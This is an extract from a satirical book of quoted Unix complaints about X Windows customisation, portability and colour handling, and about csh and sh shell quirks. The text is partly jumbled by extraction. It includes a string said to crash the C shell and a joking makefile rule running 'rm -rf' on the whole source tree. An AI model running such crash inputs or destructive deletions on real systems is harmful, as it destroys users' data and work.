this program runs cpp on the supplied filename argument. Hewlett-Packard’s Visual User Environment is so cutting-edge that it even has an icon you can click on to bring up the resource manager: it pops up a vi on your . so any old junk may have been #included from another planet. Date: From: Fri. and it #defines COLOR and a few other things as appropriate. they can do any damn thing they want. If they’re not Xt. XRn for xrn. as resource can come from any of the following (there is a specified order for this. • Filename.) in the directory /usr/lib/X11/app-defaults (or the . which has changed from R2 to R3 to R4): • . they follow some semblance of standards.Xdefaults-hostname • Filename that’s the class name of the application (usually completely nonintuitively generated: XParty for xparty. which the user runs in . The following message describes the awesome flexibility and unbounded freedom of expression that X defaults fail to provide.xsession or . They can XGetDefault. How do X programs handle defaults? Do they all roll their own? If they’re Xt. etc. pointed to by XENVIRONMENT • .132 The X-Windows Disaster Myth: X Is “Customizable” …And so is a molten blob of pig iron. and you can walk the widget tree of a running application to find out what there is to modify.Xdefaults. 22 Feb 91 08:17:14 -0800 beldar@mips. so you better know what kind of display it’s running on.xinitrc.resource: value’ • xrdb. Mwm for mwm.Xdefaults file! Quite a labor-saving contraption. But it’s getting better. Oh. which doesn’t look at any class names and doesn’t notice command line -xrm things.com (Gardner Cohen) I guess josh just sent you mail about . Figuring out where a particular resource value is for a running application is much fun. at least now you don’t have to use your bare hands. as long as you’re omniscient enough to understand X defaults and archaic enough to use vi.Xdefaults (only if they didn’t xrdb something) • Command line -xrm ’thing. I’m interested in the answer as well.
or was told by someone once to xrdb .’ and he doesn’t know why. it happily looks all over the place for amusinglooking file names to load. he does an xrdb . and finds a few SNot strings. which is no help. so .Xdefaults.xresources.goddamn. “It’s just different sometimes. What this means is that the smarter-than-the-average-bear user who actually managed to figure out that snot. who fires up emacs on the executable. the truly inventive program may actively seek out and merge resource databases from other happy places. and always describes resources starting with ‘*’. Someone points out that there is a line in Pat’s .Xdefaults. and searches for (case insensitive) snot. Joe either doesn’t xrdb. things act ‘different. The default for this directory may have been changed by whoever built and installed the x libraries. Joe sitting in the next cubicle over will say. many of them starting with dots so they won’t ‘bother’ you when you list your files. Or. could be unable to figure out where to put it.Xdefaults. Or.fontList: micro is the resource to change the font in his snot application. The Motifified xrn posted recently had a retarded resource editor that drops modified resources in files in the current directory as well as in the user’s home.” Pat Clueless has figured out that XAPPLRESDIR is the way to go. Pat asks Gardner. Gardner figures Pat can even use SNot*fontList: micro to change all the fonts in the application. Pat knows that the copy of the executable is called snot. “just put it in your . But Pat doesn’t know what the class name for this thing is. writers of WCL-based applications can load resource files that actually generate new widgets with names specified in those (or other) resource files.” but if Joe happens to have copied Fred’s . as it allows separate files for each application. It works.xsession.X Myths 133 directory pointed to by the XAPPLRESDIR environment variable). but when Pat adds a file Snot or XSnot or Xsnot. and suggests that. He wonders why when he edits .’ since he never reran xrdb to reload the resources. hooray. the changes don’t happen until he ‘logs out. Pat has a man page that forgot to mention the application class name. and when he uses the NCD from home. On startup. but finds that a few widgets don’t get that font for some reason. Oh.Xdefaults never gets read. nothing happens.widget.stupid.
as they copied the guy next door’s . which he copied from Steve who quit last year. that resources is ‘more specific’ than Pat’s.xinitrc. Sigh. so it takes precedence. Too bad. whatever the hell that means.Xdefaults? .xsession? . I’M IN HELL!!! Myth: X Is “Portable” …And Iran-Contra wasn’t Arms for Hostages. I get these weird X messages and core dumps when I try to run this application? How do I turn this autoraising behavior off? I don’t know where it came from.xrdb? . of course. a decidedly nontrivial task. The following message tells how much brain-searing. then select the window manager restart menu item (which most people don’t have. Sorry.xresources? . some of the windows come up on my workstation? Why is it when I rlogin to another machine.xinitrc? . Which file do I have to edit? . and I can't figure out why! SOMEBODY SHOOT ME.xresources (or was it a file that was #included in . You can’t even remember what application that resource was supposed to change anymore.ncd? Why doesn’t all this work the way I want? How come when I try to use the workstation sitting next to mine. If an application requires an X extension that your server doesn’t provide. Try to explain to someone how to modify some behavior of the window manager. then it fails.com] To: UNIX-HATERS Subject: X: or. Steve. or logging out. It goes on and on.mwmrc). there’s no guarantee it’ll work with your server. X applications can’t extend the server themselves—the extension has to be compiled and linked into the server. eye-popping fun compiling “portable” X server extensions can be: Date: Wed. Most interesting extensions actually require extensive modification and recompilation of the X server itself.mwmrc? Mwm? .xresources) of the form *goddamn*fontList: 10x22. I just #included Bob’s color scheme file. Even if you can get an X program to compile.134 The X-Windows Disaster . 4 Mar 92 02:53:53 PST X-Windows: Boy. and everything went wrong. Is my Butt Sore From: Jamie Zawinski [jwz@lucid. with having to re-xrdb. How I Learned to Stop Worrying and Love the Bomb . and that.
/././... or. I’ll have worked around another STUPID MISDESIGN./. . “I’ll just install this piece of code and recompile my X server and then X will be JUST a LITTLE BIT less MORONIC../. After four hours of pain. it’ll be EASY./.././include and then having to hand-hack these automatically generated makefiles anyway because some random preprocessor symbols weren’t defined and are causing spurious “don’t know how to make” errors./... what’s it DOING?” And don’t forget that you HAVE to compile ALL of PEX. and.” Then come back an hour later when it’s done making the MAKEFILES to see if there were any actual COMPILATION problems./mit/. and..... five levels higher than the executable that you actually want to generate../. and then realizing that “makedepend. is getting errors because the extension’s installation script made symlinks to directories instead of copies././. You may be thinking to yourself. because the automatically generated makefiles are coming out with stuff like: -I../. it’s an utter waste of time.” Ha! Consider whether chewing on glass might have more of a payoff than what you're about to go through... even better: -I. and say “make Everything./. Just don’t... This is for your OWN GOOD! . and… You’ll finally realize that the only way to compile anything that’s a basic part of X is to go to the top of the tree. even though none of it actually gets linked in to any executables that you’ll ever run.” which you don’t really care about running anyway. And then you’ll find yourself asking questions like. and “./include. and I’ll be WINNING.” doesn’t WORK with symlinks./..X Myths 135 Don’t ever believe the installation instructions of an X server extension./include instead of: -I. “why is it compiling that? I didn't change that. including such loveliness as a dozen directories in which you have to make a symlink called “X11” pointing at wherever the real X includes are./.
the Turbo SRX display has a graphics plane (with 24 bits per pixel) and an overlay plane (with 4 bits per pixel). /dev/crt0 and /dev/crt1. the left one and the right one. which need things like . window systems. If you really don’t need the extension. You'd think that I could simply tell X windows that it has two displays. and some extremely expensive Turbo SRX graphics hardware to drive them.mit. I lied about that. of course. sorry. double buffering. The most that can be said about the lowest-common-denominator approach that X takes to graphics is that it levels the playing field. Many find it too much of a hassle to use more ubiquitous extensions like shared memory. which was specifically designed to implement round clocks and eyeballs. The overlay plane is for things like. what I really have is two display devices. No. because X terminals and MIT servers don’t support them. So. But most application writers just don’t bother using proprietary extensions like Display PostScript. or splines: they still don’t work in many cases. then why complicate your code with special cases? And most applications that do use extensions just assume they’re supported and bomb if they’re not. but that would be unthinkably simple.edu> UNIX-HATERS the display from hell My HP 9000/835 console has two 19” color monitors. you’ll realize what you should have done ALL ALONG: all:: $(RM) -rf $(TOP) But BE CAREFUL! That second line can’t begin with a space. X extensions are a failure. well. 10 Apr 91 08:14:16 EDT Steve Strassmann <straz@media-lab. You see.136 The X-Windows Disaster And then you’ll realize what you did wrong. On the whole. if toys like the Macintosh can do this. Unix has to make it much more difficult to prove how advanced it is. The notable exception that proves the rule is the Shaped Window extension. brand-name workstations: Date: From: To: Subject: Wed. After all. allowing incredibly stupid companies to jump on the bandwagon and sell obsolete junk that’s just as unusable as high-end. so you have to be prepared to do without them.
however. which means all console messages get printed in 10 Point Troglodyte Bold. The fourth bit is reserved exclusively for the private use of federal emergency relief teams in case of a national outbreak of Pixel Rot. which have special hardware for cursors. because in order to draw a cube. /dev/ocrt0 only gives you three out of the four overlay bits. I shall run X Windows on the graphics plane. This is because I’m using Motif. and you can draw graphics on the graphics plane. No. So I really need four devices: /dev/crt0 /dev/crt1 /dev/ocrt0 /dev/ocrt1 the the the the graphics plane of the right monitor graphics plane of the left monitor overlay plane of the right monitor overlay plane of the left monitor No. This means X will not use the overlay planes. and the graphics plane is to draw 3D graphics. So. The overlay plane is used for /dev/console. sorry. This also means I cannot use the super cool 3D graphics hardware either.. is a unique pleasure. you can use /dev/o4crt0 and /dev/o4crt1 in order to really draw on the overlay planes. thinks I to myself cleverly. this workstation with $150. like for example. What it does give me. Every time anyone in the lab prints . asking for the 17th color causes your program to crash horribly. however. which is surly and uncooperative about that sort of thing.000 worth of 28 bits-per-pixel supercharged display hardware cannot display more than 16 colors at a time. My program has a browser that actually uses different colors to distinguish different kinds of nodes. a demo that I may be happen to be giving at the time. X will not run in these 4-bit overlay planes. which is so sophisticated it forces you to put a 1” thick border around each window in case your mouse is so worthless you can’t hit anything you aim at. superimposed in white over whatever else is on my screen. So. all you have to do is tell X Windows to use these o4 overlays.X Myths 137 cursors. If you’re using the Motif self-abuse kit. so you need widgets designed from the same style manual as the runway at Moscow International Airport. If you want to live dangerously and under threat of FBI investigation. I lied about that. Unlike an IBM PC Jr. I lied about that. sorry. I would have to “steal” the frame buffer from X.
Think about that. But you get extra “bonus pixels” when you pass the same arguments to XDrawRectangle. because X has no access to the overlay planes. and X Windows runs only on /dev/crt0.4.1. hanging out one pixel below and to the right!!! If you find this hard to believe. look it up in the X manual yourself: Volume 1. You can’t even draw a proper rectangle with a thick outline. I had to write a program in C to be invoked from some xterm window that does nothing but wipe up after the mess on the overlay planes. because it actually draws an 11x11 square.” This means that portably filling and stroking an arbitrarily scaled arc without overlapping or leaving gaps is an intractable problem when using the X Window System. this is a much more difficult proposition (probably impossible in a portable fashion). runs only on /dev/crt1. however. The usual X commands for refreshing the screen are helpless to remove this incontinence. Section 6. The manual patronizingly explains how easy it is to add 1 to the x and y position of the filled rectangle. while subtracting 1 from the width and height to compensate. so it fits neatly inside the outline.138 The X-Windows Disaster to the printer attached to my machine. but as the HP technical support person said “Why would you ever need to point to something that you've drawn in 3D?” Myth: X Is Device Independent X is extremely device dependent because all X graphics are specified in pixel coordinates. Not all screens even have square pixels: unless you don’t mind rectangular squares and oval circles. Graphics drawn on different resolution screens come out at different sizes. another message goes onto my screen like a court reporter with Tourette’s Syndrome. or some file server threatens to go down in only three hours for scheduled maintenance. so if your display has rectangular pixels. the vertical and horizontal lines will have different thicknesses even though you scaled the rectangle corner coordinates to compensate for the aspect ratio. My super 3D graphics. or NFS wets its pants with a timeout. so you have to scale all the coordinates yourself if you want to draw at a certain size. . then. it fills the 100 pixels you expect. Of course. you also have to adjust all coordinates according to the pixel aspect ratio. since the line width is specified in unscaled pixels units. this means I cannot move my mouse over to the 3D graphics display. Then it points out that “in the case of arcs. A task as simple as filling and stroking shapes is quite complicated because of X’s bizarre pixel-oriented imaging rules. When you fill a 10x10 square with XFillRectangle.
DefaultScreen(display))). WhitePixel(display. &vinfo) != 0) visual = vinfo. And what is your Window? win = XCreateSimpleWindow(display. DefaultScreen(display)). or a grail seeker in “Monty Python and the Holy Grail.DefaultScreen(display)). if (XMatchVisualInfo(display. What is your Root? root = RootWindow(display. What is your Colormap? cmap = DefaultColormap(display. */ /* Whoops! No. /* Black. Oh all right. PseudoColor. 0. And what is your favorite color? favorite_color = 0. you can go on. BlackPixel(display. What is your visual? struct XVisualInfo vinfo. 256. 256.X Myths 139 The color situation is a total flying circus. A truly portable X application is required to act like the persistent customer in Monty Python’s “Cheese Shop” sketch. 0. Server: (client passes) Server: Client: Server: Client: Server: Client: What is your Display? display = XOpenDisplay("unix:0"). 8.DefaultScreen(display). DefaultScreen(display)). The X approach to device independence is to treat everything like a MicroVAX framebuffer on acid. I mean: */ favorite_color = BlackPixel(display. 1.visual.DefaultScreen(display)). And what is the net speed velocity of an XConfigureWindow request? /* Is that a SubStructureRedirectMask or * a ResizeRedirectMask? */ What?! how am I supposed to know that? Aaaauuuggghhh!!!! Server: Client: Server: (server dumps core and falls into the chasm) . /* AAAYYYYEEEEE!!*/ Client: (client dumps core and falls into the chasm) Server: Client: Server: Client: What is your display? display = XOpenDisplay("unix:0"). root.” Even the simplest applications must answer many difficult questions: Server: Client: Server: Client: Server: Client: What is your Display? display = XOpenDisplay("unix:0").
NEXTSTEP is a toolkit written in Objective-C. context-switching. consistent spelling is certainly easier on the marketing ’droids. used by NeWS and Display PostScript. on top of NeXT’s own window server. NeWS has integrated extensions for input.” “NeXTstep. X’s spelling has remained constant over the years. and windows.” A standardized. and code-sharing advantages of NeWS. NeWS and NEXTSTEP were political failures because they suffer from the same two problems: oBNoXiOuS capitalization. it is still superior to X. while NeXT has at various times spelled their flagship product “NextStep. The Display PostScript extension for X is intended for output only and doesn’t address any window system issues. Nevertheless.140 The X-Windows Disaster X Graphics: Square Peg in a Round Hole Programming X Windows is like trying to find the square root of pi using roman numerals. but the Display PostScript server is not designed to be programmed with interactive code: instead all events are sent to the client for processing. lightweight processes. so it does not have the low bandwidth. which lacks the device-independent imaging model. On the other hand.” “NeXTStep. solves all these horrible problems in a high-level. networking. —Unknown The PostScript imaging model. which must be dealt with through X. and the toolkit runs in the client. . and Amiga Persecution Attitude. NEXTSTEP uses Display PostScript for imaging. Unfortunately. It has an excellent imaging model and welldesigned toolkit. standard. It can draw and respond to input in the same arbitrary coordinate system and define window shapes with PostScript paths.” “NeXTSTEP. device independent manner. but not for input.” and finally “OpenStep.” “NEXTSTEP.
X: On the Road to Nowhere 141 X: On the Road to Nowhere X is just so stupid. why do people use it? Beats us. . it’s either X or a dumb character-based terminal. If you want to run Unix. Maybe it’s because they don’t have a choice. Pick your poison. (See Figure 2) Nobody really wants to run X: what they do want is a way to run several applications at the same time using large screen.
142 The X-Windows Disaster .
X windows. X windows. Even as you read this. Flaky and built to stay that way. X windows. X windows. There’s got to be a better way. X windows. X windows is sometimes distributed by this secret consortium free of charge to unsuspecting victims. Power tools for power fools. X windows. Until DEC and MIT answer to these charges. X windows. DEC and MIT must be held accountable for this heinous software crime. X FIGURE 2. X windows. Flawed beyond belief. The destructive cost of X cannot even be guessed. X windows. and made to pay for a software cleanup. MIT stated publicly that “MIT assumes no responsibility…” This was a very disturbing statement. X windows. The first fully modular software disaster. X windows. The art of incompetence. a little history: The X window system escaped from Project Athena at MIT where it was being held in isolation. X is truly obese—whether it’s mutilating your hard disk or actively infesting your system. Innocent users need to be protected from this dangerous virus. It victimizes innocent users by distorting their perception of what is and what is not good software. a sinister X Consortium was created to find a way to use X as part of a plan to dominate and control interactive window systems across the planet. X windows. Ultimately. Garbage at your fingertips. X windows. Warn your friends about it. The cutting edge of obsolescence. Even your dog won’t like it. X windows. they both should be assumed to be protecting dangerous software criminals. X windows. No hardware is safe. X windows. X windows. Let it get in your way. The problem for your problem.X: On the Road to Nowhere 143 Official Notice. The joke that kills. X windows. brought to justice. When notified. Never had it. X windows. More than enough rope. X windows. Complex nonsolutions to simple nonproblems. you can be sure it’s up to no good. X windows. Don’t get frustrated without it. After sabotaging Digital Equipment Corporation. Distributed at the X-Windows Conference . Power tools for power losers. The defacto substandard. Putting new limits on productivity. Dissatisfaction guaranteed. X windows. Don’t be fooled! Just say no to X. This is what happens when software with good intentions goes bad. Ignorance is our most important resource. X windows. It could be worse. X windows. It must be destroyed. It could happen to you. X windows. Japan’s secret weapon. It then infiltrated Digital Equipment Corporation. X windows. Post Immediately Dangerous Virus! First. X windows. never will. A mistake carried out to perfection. X windows. Live the nightmare. Form follows malfunction. X windows. You’ll envy the dead. You’d better sit down. the X source distribution and the executable environment are being maintained on hundreds of computers. but it’ll take time. maybe even your own. X windows. X windows. Digital Equipment Corporation is already shipping machines that carry this dreaded infestation. where it has since corrupted the technical judgment of this organization. X windows. Simplicity made complex. This malignant window system must be destroyed.
144 .
Part 2: Programmer’s System? .
146 .
8 csh. ls. The user needs no understanding of electricity. today’s Unix tools are over-featured. wear safety glasses. For example. magnetism. heat dissipation. Anyone capable of using screwdriver or drill can use a power screwdriver or power drill. over-designed. and over-engineered. pipes. grep. —Unknown The Unix “power tool” metaphor is a canard. She just needs to plug it in. a program that once only listed files. motors. removing them from the market and punishing their makers. nroff). and find Power Tools for Power Fools I have a natural revulsion to any operating system that shows so little planning as to have to named all of its commands after digestive noises (awk. or maintenance. fsck. Unlike the modest goals of its designers to have tools that were simple and single-purposed. It’s rare to find a power tool that is fatally flawed in the hardware store: most badly designed power tools either don’t make it to market or result in costly lawsuits. It’s nothing more than a slogan behind which Unix hides its arcane patchwork of commands and ad hoc utilities. and pull the trigger. A real power tool amplifies the power of its user with little additional effort or instruction. torquing. now has more than 18 different . Unix power tools don’t fit this mold. Most people even dispense with the safety glasses.
Because they weren’t designed. with its arbitrary 100-characters-in-a-pathname limit. As soon as a feature was added to a shell. The find command writes cpio-formatted output files in addition to finding files (something easily done by connecting the two commands with an infamous Unix pipe). require the user to hand-wind the motor coil. the Unix equivalent of a power drill would have 20 dials and switches. come with a nonstandard plug.148 csh. . most Unix power tools are flawed (sometimes fatally for files): for example. tar. and easy to use. someone wrote a shell script that depended on that feature. thereby ensuring its survival. presumably so that they could become more powerful. incompatible shells (descriptions of each shell are from their respective man pages): sh jsh csh A command programming language that executes commands read from a terminal or a file. there is. flexible. and not accept 3/8" or 7/8" drill bits (though this would be documented in the BUGS section of its instruction manual). Bad ideas and features don’t die out. A shell with C-like syntax. The slow accretion of features caused a jumble. Identical [to sh]. and find options that control everything from sort order to the number of columns in which the printout appears—all functions that are better handled with other tools (and once were). an installed base of programs. but with csh-style job control enabled. shells could evolve. The result is today’s plethora of incomplete. pipes. hit them extra hard. they could write their own. The Shell Game The inventors of Unix had a great idea: make the command processor be just another user-level program. but evolved. It was a great idea. or Unix debuggers. but it backfired. Unix’s “power tools” are more like power switchblades that slice off the operator’s fingers quickly and efficiently. which overwrite your “core” files with their own “core” files when they crash. Unlike the tools in the hardware store. the curse of all programming languages. More importantly. If users didn’t like the default command processor. Today.
operating paradigm. The Z Shell.2 Subject: Relevant Unix bug October 11. . written by dozens of egotistical programmers. 1991 Fellow W4115x students— While we’re on the subject of activation records.” Go figure. Shell crash The following message was posted to an electronic bulletin board of a compiler class at Columbia University. KornShell. each with its own syntax. argument passing. and committing the arcane to long-term memory. egrep can be up to 50% faster than fgrep. and different sets of constraints. etc. with its cousins fgrep and egrep. different strategies for specifying options. Consider the program grep.). rules of use (this one works as a filter. Which one is fastest?1 Why do these three programs take different options and implement slightly different semantics for the phrase “regular expressions”? Why isn’t there just one program that combines the functionality of all three? Who is in charge here? After mastering the dissimilarities between the different commands. did you know that typing: !xxx%s%s%s%s%s%s%s%s 1 Ironically. The GNU Bourne-Again SHell. Hardware stores contain screwdrivers or saws made by three or four different companies that all operate similarly. and calling conventions. you’ll still frequently find yourself startled and surprised. another command and programming language. 2 Forwarded to Gumby by John Hinsdale.The Shell Game 149 tcsh ksh zsh bash Csh with emacs-style editing. this one works on temporary files. A few examples might be in order. who sent it onward to UNIX-HATERS. A typical Unix /bin or /usr/bin directory contains a hundred different kinds of programs. even though fgrep only uses fixed-length strings that allegedly make the search “fast and compact.
returning to our C string example. . but operators on the command itself. We call the operators metasyntactic because they are not part of the syntax of a command. it is necessary to write \\. The Metasyntactic Zoo The C Shell’s metasyntactic operator zoo results in numerous quoting problems and general confusion. crashing your shell kills all your processes and logs you out. Metasyntactic operators (sometimes called escape operators) are familiar to most programmers. For example. By Unix’s design. the backslash character (\) within strings in C is metasyntactic. It would be just too dangerous. you!) can bring what may be the Future Operating System of the World to its knees in 21 keystrokes? Try it. Make one false move and—bam—you’re logged out. but some operation on the following characters. and find to any C-shell will cause it to crash immediately? Do you know why? Questions to think about: • What does the shell do when you type “!xxx”? • What must it be doing with your input when you type “!xxx%s%s%s%s%s%s%s%s” ? • Why does this crash the shell? • How could you (rather easily) rewrite the offending part of the shell so as not to have this problem? MOST IMPORTANTLY: • Does it seem reasonable that you (yes.150 csh. pipes. Perhaps this is why Unix shells don’t let you extend them by loading new object code into their memory images. to get the backslash character in a string. Not Unix. For example. Zero tolerance for programmer error. Metasyntactic operators transform a command before it is issued. you have to use a quoting mechanism that tells the system to interpret the operator as simple text. it doesn’t represent itself. When you want a metasyntactic operator to stand for itself. or by making calls to object code in other programs. Other operating systems will catch an invalid memory reference and pop you into a debugger.
Be sure to quote your meta character properly. and they’re not. ^ $. since Unix requires that this metasyntactic operator be interpreted by the shell. and unset % '. such as ?. For example. ." As a result of this “design. Which means that you might have to quote them. Searching for strings that contain periods or any pattern that begins with a dash complicates matters. numerous incompatible quoting conventions are in use throughout the operating system. as with pattern matching. and ]. The C Shell’s metasyntatic zoo houses seven different families of metasyntatic operators.The Shell Game 151 Simple quoting barely works in the C Shell because no contract exists between the shell and the programs it invokes on the users’ behalf. that are metasyntactic to the shell. [. and the cages are made of tin instead of steel. Then again. consider the simple command: grep string filename: The string argument contains characters that are defined by grep. you might not.” the question mark character is forever doomed to perform single-character matching: it can never be used for help on the command line because it is never passed to the user’s program. Because the zoo was populated over a period of time. [] !. Unfortunately. the inhabitants tend to stomp over each other. The seven different transformations on a shell command line are: Aliasing Command Output Substitution Filename Substitution History Substitution Variable Substitution Process Substitutuion Quoting alias and unalias ` *. Having seven different classes of metasyntactic characters wouldn’t be so bad if they followed a logical order of operations and if their substitution rules were uniformly applied. But they don’t. depending on the shell you use and how your environment variables are set. set. ?.
!ema and !?foo also work for history substitution.uiuc.shell >>>>> On Sun.cs. one can also say %?foo if the substring “foo” appeared in the command line.” To avoid shell processing required an amazingly arcane incantation that not even most experts can understand. pipes.gnu.” Take the case of Milt Epstein. 18 Aug 91 18:21:58 -0500. who wanted a way of writing a shell script to determine the exact command line being typed. but Milt> I’m not sure exactly what it means.unix. making apparently simple things incredibly difficult to do.help. >>>>> Milt Epstein <epstein@suna0. Of course. and find Date: From: Subject: To: Mon. 7 May 90 18:00:27 -0700 Andy Beals <bandy@lll-crg. the pinheads at UCB didn’t make !?foo recognize subsequent editing commands so the brain-damaged c-shell won’t recognize things like !?foo:s/foo/bar&/:p making typing a pain.edu> said: Milt> what does the “${1+“$@”}” mean? I’m sure it’s to Milt> read in the rest of the command line arguments. without any preprocessing by the shell. Was it really so hard to scan forward for that one editing character? All of this gets a little confusing.emacs.llnl.comp.152 csh.gov> Re: today’s gripe: fg %3 UNIX-HATERS Not only can you say %emacs or even %e to restart a job [if it’s a unique completion].com Subject: ${1+“$@”} in /bin/sh family of shells shell scripts Newsgroups: comp. This is typical of Unix. even for Unix “experts. simply because they weren’t thought of when Unix was first built: Date: 19 Aug 91 15:26:00 GMT From: Dan_Jacobson@att.emacs. He found out that this wasn’t easy because the shell does so much on the program’s “behalf. It’s the way to exactly reproduce the command line arguments in the /bin/sh family of shells shell script. However. .
” and “. “If there is at least one argument ( ${1+ ). Why not “$*” etc. parameter and command substitution occurs and the shell quotes the results to avoid blank interpretation and file name generation.” that refers to the parent of the directory. has a subdirectory named “ftp. within each argument. but we want no arguments reproduced in that case. however. then substitute in all the arguments ( “$@” ) preserving all the spaces. I can return to /home/ar/alan by typing “cd . you all know about “. none of them stopping to consider their effects upon one another. . separated by quoted spaces (“$1 $2 …”).” that refers to the directory itself. Date: From: Subject: To: Mon. The Shell Command “chdir” Doesn’t Bugs and apparent quirky behavior are the result of Unix’s long evolution by numerous authors. /home/ar/alan.” Wow! All the way back to Version 7. So now I’m in /home/ar/alan/ftp. : I am not making this up UNIX-HATERS What could be more straightforward than the “cd” command? Let's consider a simple case: “cd ftp.? From a sh(1) man page: Inside a pair of double quote marks (“”). So in our example. the positional parameters are substituted and quoted. Easy. separated by unquoted spaces (“$1” “$2” …). Now. 7 May 90 22:58:58 EDT Alan Bawden <alan@ai. etc.” then that becomes my new current directory. If $* is within a pair of double quotes. not “”.”? Every directory always has two entries in it: one named “. If we used only “$@” then that would substitute to “” (a null argument) if there were no invocation arguments.edu> cd . . I think ${1+“$@”} is portable all the way back to “Version 7 Unix. .mit. all trying to take the operating system in a different direction. if $@ is within a pair of double quotes. the positional parameters are substituted and quoted.The Shell Game 153 It says.” If my current directory.”. . and one named “. .
Suppose I want to go there next.”.154 csh. That is. They don’t have all the pieces they need. . a program written in the shell “programming language” can run on many different flavors of Unix running on top of many different computer architectures. Like all directories /com/ftp/pub/alan contains an entry named “. sh. I type: % cd .edu> Simple Shell Programming UNIX-HATERS . have a big advantage over programs written in languages like C: shell programs are portable. Suppose that it points to the directory /com/ftp/pub/ alan. Shell programs. pipes. the standard Unix shell. . Then after “cd ftp” I’m sitting in /com/ftp/pub/alan. Let’s put the theory to the test by writing a shell script to print the name and type of every file in the current directory using the file program: Date: From: Subject: To: Fri.” that refers to its superior: /com/ftp/pub. What’s more.mit. If I really wanted to visit /com/ ftp/pub.. they can’t always control their creations. so they fill in the missing pieces with random genomic material.lcs. and the cd command guesses that I would rather go back to the directory that contained the link. goes the theory. we are likely to find it on any machine. Guess what? I’m back in /home/ar/alan! Somewhere in the shell (apparently we all use something called “tcsh” here at the AI Lab) somebody remembers that a link was chased to get me into /com/ftp/ pub/alan. I should have typed “cd . rather than compiling them into machine code. and find Now suppose that “ftp” was a symbolic link (bear with me just a while longer). Despite tremendous self-confidence and ability. Shell Programming Shell programmers and the dinosaur cloners of Jurassic Park have much in common. because the shell interprets its programs. thus. has been a central part of Unix since 1977 and. / . 24 Apr 92 14:45:48 EDT Stephen Gildea <gildea@expo.
anyway.. No problem. files: for file in `ls -a` do if [ $file != .” The “sh” shell is a simple. Oh dear. Well. but we'll start with a basic example: Print the types of all the files in a directory. -a $file != .. and * won’t match them. we'll use “ls -f” instead. It’s faster. ] then file $file fi done Not quite as elegant. the * matches all the files in the directory.Shell Programming 155 Hello. not quite. shh!) While we're learning to sh. but since we do want to be robust. we'll pass -a instead and then weed out the . I hope all this is obvious from reading the manual pages. the “ls” on some systems doesn’t take a “-A” flag. versatile program. isn’t it? A simple solution for a simple problem. of course we also want the program we are writing to be robust. so the following should be trivially obvious: file * Very nice. portable. Today we are going to learn to program in “sh.. and . There probably aren’t any. but at least it’s robust and portable.. . What’s that? “ls -a” doesn’t work everywhere either? No problem. robust. I assume you've all read the appropriate manual pages. Files beginning with a dot are assumed to be uninteresting. (I heard that remark in the back! Those of you who are a little familiar with the shell and bored with this can write “start an X11 client on a remote machine” for extra credit. class. we’ll use “ls” and pass a special flag: for file in `ls -A` do file $file done There: elegant. and elegant. In the mean time.
not too much!) our variables. that’s not too hard to deal with. but we haven't eliminated it.* * do if [ "$file" != . Our script has lost some of its simplicity.. But then someone tries it on an empty directory. and carefully quote (not too little.156 csh. pipes. -a "$file" != . ] then file "$file" fi done Some of you alert people will have already noticed that we have made the problem smaller. Well. If we removed the “ls” then we wouldn’t have to worry about parsing its output. We keep adding more strangely named files to our test directory. Unix file names can have any character in them (except slash). What about for file in . A space in a filename will break this script.. and the * pattern produces “No such file. and it is still in IFS. Handles dot files and files with nonprinting characters. perhaps not so robust after all. -a "$file" != . and find Hmm. and this script continues to work. like this: IFS=' ' for file in `ls -f` do if [ "$file" != . so it is time to reevaluate our approach. so I'm afraid I'll have to close here and leave fixing the remaining bugs as an exercise for the reader.” But we can add a check for that… …at this point my message is probably getting too long for some of your uucp mailers. We'll just change the IFS to not include Space (or Tab while we're at it). Stephen . since the shell will parse it as two file names. because Linefeed is also a legal character in a filename. ] then file "$file" fi done Looks good.
For example. But then: crc. I just ran ‘file’ over a directory full of C source code— here is a selection of the results: arith.mit.c look more like C… tcfs. Date: From: Subject: To: Sat. time.h looked less like C after version 1.c” in the filename.c: bintxt.c: ascii text See. so good.h apparently looks like English.h: English text That’s right. rather than just ascii.c: c program text I guess I changed something after version 4 that made gencrc.c didn’t look enough like C code—although to me it couldn’t possibly be anything else. The Unix file program doesn’t work. gencrc. 25 Apr 92 17:33:12 EDT Alan Bawden <Alan@lcs. Apparently crc. Back up. You're actually proposing to use the ‘file’ program? Everybody who wants a good laugh should pause right now.~4~: ascii text gencrc. and try typing “file *” in a directory full of miscellaneous files.edu> Simple Shell Programming UNIX-HATERS WHOA! Hold on a second.h: c program text ascii text while tcfs.h.c.~1~: tcfs.c: c program text c program text c program text So far.Shell Programming 157 There is another big problem as well. one that we’ve been glossing over from the beginning. I wonder if ‘file’ has recognition rules for Spanish or French? . find a Unix machine.c: binshow. time. ‘file’ isn’t looking at the “. it’s applying some heuristics based on an examination of the contents of the file.
except that semantics of shell variables—when they get defined.h: Makefile: shell commands [nt]roff. As we’ve mentioned before. tbl.h: ascii text English text Perhaps I added some comments to words.com> You learn something new every day UNIX-HATERS Running this script: #!/bin/csh unset foo if ( ! $?foo ) then echo foo was unset else if ( "$foo" = "You lose" ) then echo $foo . Frequently.” but I digress…) words. This wouldn’t be so bad. sh and csh implement shell variables slightly differently.~1~: words. Date: From: Subject: To: Thu.h. counter-intuitive ways that can only be comprehended after extensive experimentation. and other behaviors—are largely undocumented and ill-defined.158 csh. shell variables behave in strange. I wonder what would happen if I tried to use them as if they were the kinds of program that the ‘file’ program assigns them? —Alan Shell Variables Won’t Things could be worse for Alan. your typical TeX source file gets classified as “ascii text” rather than “English text.h after version 1? But I saved the best for last: arc. pipes. 14 Nov 1991 11:46:21 PST Stanley’s Tool Works <lanning@parc. for instance. or eqn input text Both wildly wrong. be trying to use shell variables. and find (BTW. He could. the atomicity of change operations.xerox.
Shell Programming 159
endif produces this error: foo: Undefined variable. To get the script to “do the right thing,” you have to resort to a script that looks like this: #!/bin/csh unset foo if ( ! $?foo ) then echo foo was unset set foo else if ( "$foo" = "You lose" ) then echo $foo endif [Notice the need to ‘set foo’ after we discovered that it was unset.] Clear, eh?
Error Codes and Error Checking
Our programming example glossed over how the file command reports an error back to the shell script. Well, it doesn’t. Errors are ignored. This behavior is no oversight: most Unix shell scripts (and other programs as well) ignore error codes that might be generated by a program that they call. This behavior is acceptable because no standard convention exists to specify which codes should be returned by programs to indicate errors. Perhaps error codes are universally ignored because they aren’t displayed when a user is typing commands at a shell prompt. Error codes and error checking are so absent from the Unix Canon that many programs don’t even bother to report them in the first place. Date: From: Subject: To: Tue, 6 Oct 92 08:44:17 PDT Bjorn Freeman-Benson <bnfb@ursamajor.uvic.ca> It’s always good news in Unix land UNIX-HATERS
